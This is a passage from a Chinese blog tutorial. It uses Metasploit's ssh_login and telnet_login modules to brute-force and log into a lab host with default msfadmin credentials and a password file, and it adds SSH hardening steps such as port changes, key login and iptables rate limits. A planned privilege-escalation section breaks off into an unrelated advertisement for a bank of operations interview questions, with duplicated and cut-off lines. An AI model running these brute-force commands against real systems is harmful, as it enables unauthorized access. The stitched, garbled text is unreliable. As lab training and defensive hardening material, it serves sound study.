## 3、Metasploit获取Metaspreter Shell
利用获取的Bash shell,注入Metasploit中Metaspreter payload从而获取更强大功能的shell
msfconsole
msf>use auxiliary/scanner/ssh/ssh_login
msf>show options
登录系统
msf>run
查看会话2的具体信息
msf>sessions -u 2
msf>sessions -l
查看帮助
msf>help
msf>msf>sessions -u 4
msf>exit
查看连接情况
netstat -pantu
#ifconfig
msfconsole
msf>use auxiliary/scanner/ssh/ssh_login
msf>show options
msf>set rhosts 192.168.1.100
msf>set username msfadmin
msf>set password msfadmin
msf>run
msf>sessions -l
查看会话1的登录端口等信息
msf>sessions -u 1
msf>sessions -l
查看登录的系统版本信息
msf>sysinfo
msf>
## SSH安全防御
1、SSH修改默认端口
2、SSH防御暴力破解用户账号
3、SSH设置PGP登录
4、Iptables设置阈值防止暴力破解
## 1、SSH修改默认端口
默认情况下,SSH使用22端口。为了安全,一般情况下都会修改默认端口
#service sshd status
#vi /etc/ssh/sshd_conifg
port 66
#service sshd restart
注意:修改之后,必须重启ssh服务
## 2、SSH防御暴力破解用户账号
在Linux下可以配置不能使用用户名和密码登录,只使用SSH PGP方式验证登录。规避了SSH暴力破解
出现问题 :不能使用用户密码登录,很大程度上存在复杂操作
测试
配置成功
## 3、SSH设置PGP登录
默认情况下,SSH使用用户名和密码远程登录。但也可以使用密钥对进程身份验证登录(公钥和私钥)
## 4、Iptables设置阈值防止暴力破解
利用Iptables对多次连接验证错误,进行账户锁定120秒
#iptables -I INPUT -p tcp --dport 22 -i eth0 -m state NEW -m recent --set
#iptables -I INPUT -p tcp --dport 22 -i eth0 -m state NEW -m recent --update --seconds 120 --hitcount 3 -j DROP
#service ssh restart
在设置完之后,需要重新启动SSH服务
## 暴力破解、认证过程、登录提权
1、telnet版本获取
2、telnet密码破解
3、telnet登录测试
针对Telnet暴力破解
Telnet服务端默认情况下使用23端口
**1、telnet版本获取**
使用nmap获取telnet版本信息,或者使用metasploit获取对应版本信息。
#nmap -p23 -sV 192.168.1.105
使用msfconsole
msfconsole
msf>use auxiliary/scanner/telnet/telnet_version
msf>show options
运行run,进行ssh登录
msf>run
查看连接的会话
msf>sessions -l
查看登录用户的ID
msf>sessions -i 1
msf>search telnet
**2、telnet密码破解**
msf>use auxiliary/scanner/telnet/telnet_login
msf>set rhosts 192.168.1.105
msf>show options
msf>set username msfadmin
msf>set password msfadmin
msf>set password
查看用户密码
msf>show options
取消查看用户密码
msf>unset password
msf>show options
msf>set pass_file /root/Desktop/pass.txt
msf>set threads 10
运行命令,从pass.txt中的密码一个一个测试
msf>run
msf>
msf>
**3、telnet登录测试**
使用破解好的会话链接telnet,并执行对应命令。
使用sessions -l 例举建立的会话
使用sessions -i id 使用对应的会话
msf>sessions -l
msf>sessions -i id
#ifconfig
## telnet登录提权
1、msf登录telnet
2、设置kali nc监听
3、msf连接shell下载exp
4、编译执行exp,获取root
**1、msf登录telnet**
在metasploit中使用telnet\_login进行登录,并使用sessions -i id 连接shell
msfconsole
msf>use auxiliary/scanner/telnet/telnet_login
msf>set rhosts 192.168.1.105
msf>show options
msf>set username msfadmin
msf>set password msfadmin
msf>set password
msf>run
msf>sessions -l
msf>sessions -i 1
**2、msf连接shell下载exp**
为了做好运维面试路上的助攻手,特整理了上百道 【运维技术栈面试题集锦】 ,让你面试不慌心不跳,高薪offer怀里抱!
这次整理的面试题,小到shell、MySQL,大到K8s等云原生技术栈,不仅适合运维新人入行面试需要,还适用于想提升进阶跳槽加薪的运维朋友。
本份面试集锦涵盖了
- 174 道运维工程师面试题
- 128道k8s面试题
- 108道shell脚本面试题
- 200道Linux面试题
- 51道docker面试题
- 35道Jenkis面试题
- 78道MongoDB面试题
- 17道ansible面试题
- 60道dubbo面试题
- 53道kafka面试
- 18道mysql面试题
- 40道nginx面试题
- 77道redis面试题
- 28道zookeeper
总计 1000+ 道面试题, 内容 又全含金量又高
- 174道运维工程师面试题
1、什么是运维?
2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?
3、现在给你三百台服务器,你怎么对他们进行管理?
4、简述raid0 raid1raid5二种工作模式的工作原理及特点
5、LVS、Nginx、HAproxy有什么区别?工作中你怎么选择?
6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?
7、Tomcat和Resin有什么区别,工作中你怎么选择?
8、什么是中间件?什么是jdk?
9、讲述一下Tomcat8005、8009、8080三个端口的含义?
10、什么叫CDN?
11、什么叫网站灰度发布?
12、简述DNS进行域名解析的过程?
13、RabbitMQ是什么东西?
14、讲一下Keepalived的工作原理?
15、讲述一下LVS三种模式的工作过程?
16、mysql的innodb如何定位锁问题,mysql如何减少主从复制延迟?
1raid5二种工作模式的工作原理及特点
5、LVS、Nginx、HAproxy有什么区别?工作中你怎么选择?
6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?
7、Tomcat和Resin有什么区别,工作中你怎么选择?
8、什么是中间件?什么是jdk?
9、讲述一下Tomcat8005、8009、8080三个端口的含义?
10、什么叫CDN?
11、什么叫网站灰度发布?
12、简述DNS进行域名解析的过程?
13、RabbitMQ是什么东西?
14、讲一下Keepalived的工作原理?
15、讲述一下LVS三种模式的工作过程?
16、mysql的innodb如何定位锁问题,mysql如何减少主从复制延迟?
17、如何重置mysql root密码?
扫一扫
1816
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
